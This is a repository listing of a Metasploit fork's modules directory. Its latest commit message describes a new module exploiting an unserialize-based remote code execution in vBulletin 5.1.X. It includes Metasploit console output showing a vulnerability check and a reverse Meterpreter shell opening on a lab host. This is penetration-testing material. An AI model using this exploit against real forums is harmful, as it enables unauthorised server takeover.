adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
bb0e64e5412e6e79a7f52077d62eb89a295bbd62
metasploit-gs/modules
T
History
jvoisin bb0e64e541 Implement a module for the recent vBulletin RCE 
This module implements the recent unserialize-powered RCE against
vBulletin 5.1.X

Step to reproduce:

1. Install vBulletin 5.1.X
2. Launch the exploit against it

```
msf exploit(vbulletin_unserialize) > check
[*] 192.168.1.25:80 - The target appears to be vulnerable.
msf exploit(vbulletin_unserialize) >
```

```
msf exploit(vbulletin) > run

[*] Started reverse handler on 192.168.1.11:4444
[*] Sending stage (33068 bytes) to 192.168.1.25
[*] Meterpreter session 1 opened (192.168.1.11:4444 -> 192.168.1.25:49642) at 2015-11-06 14:04:46 +0100

meterpreter > getuid
Server username: www-data (33)
```
2015-11-06 14:59:25 +01:00
..
auxiliary
Land #6089, @jvazquez-r7 Fix HTTP mixins namespaces
2015-11-05 16:56:41 -06:00
encoders
Land #5510, update x86/alpha* encoders to be SaveRegister aware
2015-10-01 15:07:10 -05:00
exploits
Implement a module for the recent vBulletin RCE
2015-11-06 14:59:25 +01:00
nops
Use each_char
2015-08-17 11:08:40 -05:00
payloads
update payload size cache
2015-10-30 17:35:05 -05:00
post
Land #5720, @g0tmi1k's changes to firefox_creds post module
2015-11-05 15:36:08 -06:00